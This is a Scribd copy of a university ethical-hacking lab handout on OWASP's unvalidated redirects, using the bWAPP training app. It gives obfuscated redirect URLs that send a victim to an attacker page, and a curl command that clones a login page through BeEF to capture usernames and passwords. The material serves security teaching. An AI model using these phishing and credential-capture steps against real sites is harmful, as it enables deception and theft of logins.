0% found this document useful (0 votes)

226 views5 pages

Week 8 - A10 - Unvalidated Redirects & Forwards

The document describes an exercise on unvalidated redirects and forwards security vulnerabilities. It explains that web applications can be exploited if they redirect or forward users to other pages without validating the destination URLs. The exercise demonstrates how an attacker could craft obfuscated URLs to redirect a victim to a phishing site or unauthorized page by abusing an application's unvalidated redirect feature. It also shows how to clone a legitimate web page using BEEF to steal login credentials by redirecting the victim to the fake page rather than the real one.

Uploaded by

Paul Crane

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as DOCX, PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

226 views5 pages

Week 8 - A10 - Unvalidated Redirects & Forwards

Uploaded by

Paul Crane

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as DOCX, PDF, TXT or read online on Scribd

You are on page 1/ 5

17/03/2021

A10 - Unvalidated Redirects & Forwards

Ethical Hacking Lab Exercise

Introduction
Web applications frequently redirect and forward users to other pages and websites, and
use untrusted data to determine the destination pages. Without proper validation, attackers
can redirect victims to phishing or malware sites, or use forwards to access unauthorized
pages.

The following article has an excellent explanation: -

http://www.troyhunt.com/2011/12/owasp-top-10-for-net-developers-part-10.html

Reference: -
https://www.owasp.org/index.php/Top_10_2010-A10-
Unvalidated_Redirects_and_Forwards

SECTION 1: bWAPP Exercises

The following exercises are from menu A10.

Unvalidated Redirects & Forwards (1)

 In Windows, run Firefox and access the web page and then run Live HTTP Headers.

 Select Blog and then Beam.

The request is as shown below: -

This illustrates that the application will re-direct to itsecgames.blogspot.com

The hack involves a social engineering (phishing) attack of sending the user a link that will
take them to a different page and using obfuscation to mask the real URL. i.e.

C McLean School of Computing UAD Page 1 514733133.docx

17/03/2021

The original link is: -

http://192.168.1.100/bWAPP/unvalidated_redir_fwd_1.php?url=http%3A%2F
%2Fitsecgames.blogspot.com&form=submit

We could send the link of

http://192.168.1.100/bWAPP/unvalidated_redir_fwd_1.php?url=http%3A%2F
%192.168.1.1/bad.html&form=submit

And obfuscate the real location of the link (i.e. obfuscate http://192.168.1.1/bad.html) : -

http://192.168.1.100/bWAPP/unvalidated_redir_fwd_1.php?url=%68%74%74%70%3a%2f
%2f%31%39%32%2e%31%36%38%2e%31%2e%31%2f%62%61%64%2e%68%74%6d
%6c&form=submit

 Using the following link obfuscator, prove that the three links below are the same
(i.e. they all re-direct to www.bbc.co.uk http://codewelt.com/proj/urlobfuscator

http://192.168.1.100/bWAPP/unvalidated_redir_fwd_1.php?
url=http://www.bbc.co.uk&form=submit

http://192.168.1.100/bWAPP/unvalidated_redir_fwd_1.php?url=%68%74%74%70%3A%2F
%2F%77%77%77%2E%62%62%63%2E%63%6F%2E%75%6B&form=%73%75%62%6D%69%74

http://192.168.1.100/bWAPP/unvalidated_redir_fwd_1.php?%75%72%6C=
%68%74%74%70%3A%2F%2F%77%77%77%2E%62%62%63%2E%63%6F%2E%75%6B&
%66%6F%72%6D=%73%75%62%6D%69%74

Unvalidated Redirects & Forwards (2)

 Using the same technique above, craft an obfuscated URL to re-direct to a web page
of your choosing.

C McLean School of Computing UAD Page 2 514733133.docx

17/03/2021

OPTIONAL EXERCISE: - Site cloning using BEEF

In the above exercise, the user would be tricked into visiting a page of our choosing. The
following exercise, we will

 Clone the bWAPP logon page for using with BEEF.

 Re-direct the user to this logon page by crafting a link.
 Use BEEF to capture the users key strokes (i.e. user name & password).

In Kali linux, open a terminal and run Beef using the following: -

cd /user/share/beef-xss
./beef

We will now clone the site and sent it to BEEF using curl. The syntax is as follows: -

curl -H "Content-Type: application/json; charset=UTF-8" -d

'{"url":"http://192.168.1.100/bWAPP/login.php","mount":"/login.php"}' -X POST
http://192.168.1.1:3000/api/seng/clone_page?
token=cc44a82cb3d566916681cabd9cd5d93f1eb110f0;

Where: -

 http://192.168.1.100/bWAPP/login.php is the site we wish to clone: -

 http://192.168.1.1:3000 is the URL where BEEF is running.
 The token cc44a82cb3d566916681cabd9cd5d93f1eb110f0 is the RESTful API key
obtained from the BEEF window.

In Kali linux, run a second terminal and paste the following: -

curl -H "Content-Type: application/json; charset=UTF-8" -d

'{"url":"http://192.168.1.100/bWAPP/login.php","mount":"/login.php"}' -X POST
http://192.168.1.1:3000/api/seng/clone_page?token= XXXX